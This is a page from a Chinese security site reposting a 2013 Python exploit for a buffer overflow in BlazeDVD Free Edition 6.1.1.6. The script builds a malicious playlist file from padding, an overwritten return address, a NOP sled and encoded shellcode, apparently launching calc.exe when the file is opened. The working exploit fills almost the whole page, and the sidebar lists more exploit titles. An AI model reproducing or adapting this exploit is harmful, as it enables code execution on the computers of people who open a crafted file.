首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlazeDVD Free Edition 6.1.1.6 Buffer Overflow
来源:vfocus.net 作者:metacom 发布时间:2013-03-29  
#!/usr/bin/python
# Exploit Title:BlazeDVD Free Edition 6.1.1.6 Buffer Overflow
# Date: 27-03-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.blazevideo.com/dvd-player/
# Download version 6.1.0.6: www.blazevideo.com/download.php?product=BlazeDVD
# Version: BlazeDVD Free Edition 6.1.1.6
# Tested on: Windows 7 German

f=open("video.plf","w")
print "Creating expoit."
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"


buffer= "\x41" *  260 # 260 608
eip= "\xeb\x8b\x65\x61"            #61658beb
nop= "\x90" * 20
#CMD=calc.exe bad #\x00\x0a\x1a
shell= ("\xbf\x92\xce\xe9\xc9\xda\xd0\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x33\x31\x78\x12\x83\xe8\xfc\x03\xea\xc0\x0b\x3c\xf6\x35\x42"
"\xbf\x06\xc6\x35\x49\xe3\xf7\x67\x2d\x60\xa5\xb7\x25\x24\x46"
"\x33\x6b\xdc\xdd\x31\xa4\xd3\x56\xff\x92\xda\x67\x31\x1b\xb0"
"\xa4\x53\xe7\xca\xf8\xb3\xd6\x05\x0d\xb5\x1f\x7b\xfe\xe7\xc8"
"\xf0\xad\x17\x7c\x44\x6e\x19\x52\xc3\xce\x61\xd7\x13\xba\xdb"
"\xd6\x43\x13\x57\x90\x7b\x1f\x3f\x01\x7a\xcc\x23\x7d\x35\x79"
"\x97\xf5\xc4\xab\xe9\xf6\xf7\x93\xa6\xc8\x38\x1e\xb6\x0d\xfe"
"\xc1\xcd\x65\xfd\x7c\xd6\xbd\x7c\x5b\x53\x20\x26\x28\xc3\x80"
"\xd7\xfd\x92\x43\xdb\x4a\xd0\x0c\xff\x4d\x35\x27\xfb\xc6\xb8"
"\xe8\x8a\x9d\x9e\x2c\xd7\x46\xbe\x75\xbd\x29\xbf\x66\x19\x95"
"\x65\xec\x8b\xc2\x1c\xaf\xc1\x15\xac\xd5\xac\x16\xae\xd5\x9e"
"\x7e\x9f\x5e\x71\xf8\x20\xb5\x36\xf6\x6a\x94\x1e\x9f\x32\x4c"
"\x23\xc2\xc4\xba\x67\xfb\x46\x4f\x17\xf8\x57\x3a\x12\x44\xd0"
"\xd6\x6e\xd5\xb5\xd8\xdd\xd6\x9f\xba\x80\x44\x43\x13\x27\xed"
"\xe6\x6b")
try:    
    f.write(head+buffer+eip+nop+shell)
    f.close()
    print "File created"
except:
    print "File cannot be created"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·v0pCr3w Web Shell Remote Code
·McAfee Virtual Technician (MVT
·Java CMM Remote Code Execution
·Konftel 300IP SIP-based Confer
·Konftel 300IP 2.1.2 Reboot Byp
·ALLMediaServer 0.94 Buffer Ove
·Joomla Component JCE File Uplo
·KNet Web Server 1.04b - Buffer
·Ruby Thumbshooter Gem 0.1.5 Re
·Draytek Vigor 3900 1.06 - Priv
·KNet Web Server Buffer Overflo
·STUNSHELL Web Shell Remote PHP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved